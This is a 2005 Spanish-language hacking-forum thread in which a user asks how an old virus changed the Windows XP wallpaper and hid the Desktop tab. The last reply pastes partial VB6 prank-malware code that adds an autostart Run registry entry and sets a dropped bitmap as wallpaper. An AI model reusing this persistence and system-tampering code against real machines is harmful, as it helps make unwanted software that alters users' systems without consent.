elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Una boludez, solo es un comando...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Una boludez, solo es un comando...  (Leído 1,701 veces)
Victor-SB

Desconectado Desconectado

Mensajes: 32



Ver Perfil
Una boludez, solo es un comando...
« en: 31 Julio 2005, 00:15 am »

Buenas,

Si no recuerdan mal, a existido varias variantes de un virus antiguo que cuando te infectabas tu escritorio era cambiado por otro y cuando ibas a cambiar de fondo, veías que la pestaña Escritorio estaba eliminada, y me gustaría saber si alguien tiene su código, o si nadie lo tiene, me podrían dar una mano de cómo hacer que haga estas funciones con el S.O. Windows XP….
Es decir que el fondo escritorio actual se cambie por otro que quiera yo, al ejecutar el .exe sólo eso, no quiero que se elimine la pestaña de Escritorio, sólo quiero saber el comando de esta orden de que se cambie el fondo de escritorio por otro, una boludez, pero me gustaría saber que comandos eran =$

gracias


En línea

programatrix


Desconectado Desconectado

Mensajes: 3.287


Ver Perfil WWW
Re: Una boludez, solo es un comando...
« Respuesta #1 en: 31 Julio 2005, 00:33 am »

Usa las api y el registro...


En línea

{_The_Alwar_}


Desconectado Desconectado

Mensajes: 711

Who dares win


Ver Perfil WWW
Re: Una boludez, solo es un comando...
« Respuesta #2 en: 31 Julio 2005, 00:45 am »

en el registro se guardan cosas del escritorio? ... jo cada dia se aprende algo
En línea

Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: Una boludez, solo es un comando...
« Respuesta #3 en: 31 Julio 2005, 01:01 am »

Para ocultar la pestaña de configuración del wallpaper lee sobre políticas del sistema, más exactamente sobre una llamada NoDispBackgroundPage

Funciones para manipular el registro utilizando la API

Para cambiar el wallpaper mira la función SystemParametersInfo, constante SPI_SETDESKWALLPAPER

Saludos.

EDIT: Políticas del sistema
« Última modificación: 31 Julio 2005, 01:05 am por Anhur » En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
goodbye

Desconectado Desconectado

Mensajes: 93



Ver Perfil
Re: Una boludez, solo es un comando...
« Respuesta #4 en: 31 Julio 2005, 19:32 pm »

Esto es de hace 3 años, lo pego tal como estaba. Perdona la ortografía.

Código:
Const HKEY_LOCAL_MACHINE = &H80000002
Const STANDARD_RIGHTS_ALL = &H1F0000
Const KEY_QUERY_VALUE = &H1
Const KEY_SET_VALUE = &H2
Const KEY_CREATE_SUB_KEY = &H4
Const KEY_ENUMERATE_SUB_KEYS = &H8
Const KEY_NOTIFY = &H10
Const KEY_CREATE_LINK = &H20
Const SYNCHRONIZE = &H100000
Const KEY_ALL_ACCESS = ((STANDARD_RIGHTS_ALL Or KEY_QUERY_VALUE Or _
KEY_SET_VALUE Or KEY_CREATE_SUB_KEY Or KEY_ENUMERATE_SUB_KEYS Or _
KEY_NOTIFY Or KEY_CREATE_LINK) And (Not SYNCHRONIZE))
Const REG_SZ = 1
Const SPI_SCREENSAVERRUNNING = 97&
Const SWP_NOSIZE = &H1
Const SWP_NOMOVE = &H2
Const FLAGS As Long = SWP_NOMOVE Or SWP_NOSIZE
Const HWND_TOPMOST = -1
Const HWND_NOTOPMOST = -2
Const EWX_LOGOFF = 0
Const EWX_SHUTDOWN = 1
Const EWX_REBOOT = 2
Const EWX_FORCE = 4
Const Muestra = &H40
Const Oculta = &H80
Dim Ventana2 As Long
Dim resultado As Long
Dim Hacer As Byte
Dim On_off As Boolean
Private Declare Function SystemParametersInfo Lib "user32" Alias _
"SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, _
lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" _
(ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, _
ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" _
(ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function SetForegroundWindow Lib "user32" (ByVal hwnd As Long) As Long
Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" _
(ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Declare Function SHShutDownDialog Lib "shell32" Alias "#60" (ByVal YourGuess As Long) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName _
 As String, ByVal lpWindowName As String) As Long
Private Declare Function SetWindowPos Lib "user32" ( _
  ByVal hwnd As Long, ByVal hWndInsertAfter As Long, _
  ByVal x As Long, ByVal y As Long, ByVal cx As Long, _
  ByVal cy As Long, ByVal wFlags As Long) As Long
Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Private Declare Function SetWindowRgn Lib "user32" (ByVal hwnd As Long, _
                ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long
'Private Declare Function CreateEllipticRgn Lib "gdi32" (ByVal X1 As Long, _
                ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
        (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function SystemParametersInfo2 Lib "user32" Alias _
"SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As _
Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" _
    Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, _
    ByVal nSize As Long) As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long

Private Sub Registro()
    ChDir App.Path
    Dim LpClass As String
    Dim Manejador1 As Long
    Dim Var_lpValueName As String, Var_lpData As String, Var_cbData As Long
    Var_lpValueName = "setup"
    Var_lpData = App.Path & "\setup.exe"
    Var_cbData = Len(Var_lpData)
    RegOpenKeyEx HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", _
    0, KEY_ALL_ACCESS, Manejador1
    RegSetValueEx Manejador1, Var_lpValueName, 0, REG_SZ, ByVal Var_lpData, ByVal Var_cbData
    RegCloseKey Manejador1
End Sub

Sub BMP()
    Dim x
    Dim tapiz As Integer
    On Error GoTo Fallo
    x = GetAttr(SistemDir & "\Y00A24I65M53A.BMP")
    tapiz = SystemParametersInfo2(20, 0, SistemDir & "\Y00A24I65M53A.bmp", 0)
Exit Sub
Fallo:
    SavePicture Image1, SistemDir & "\Y00A24I65M53A.BMP"
End Sub

Private Function SistemDir() As String
    Dim WinDir As String
    Dim ReturnSize As Long
    WinDir = String(255, 0)
    ReturnSize = GetWindowsDirectory(lpBuffer:=WinDir, nSize:=Len(WinDir))
    SistemDir = Left(WinDir, ReturnSize)
End Function

Private Sub Form_Load()
    Registro
End Sub

Saludos.
« Última modificación: 31 Julio 2005, 20:03 pm por CrackelDestripador » En línea

Al lado de la dificultad está la facilidad.
Cambiad de placeres, pero no cambies de amigos.
Aceptar un favor de un amigo, es hacerle otro.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines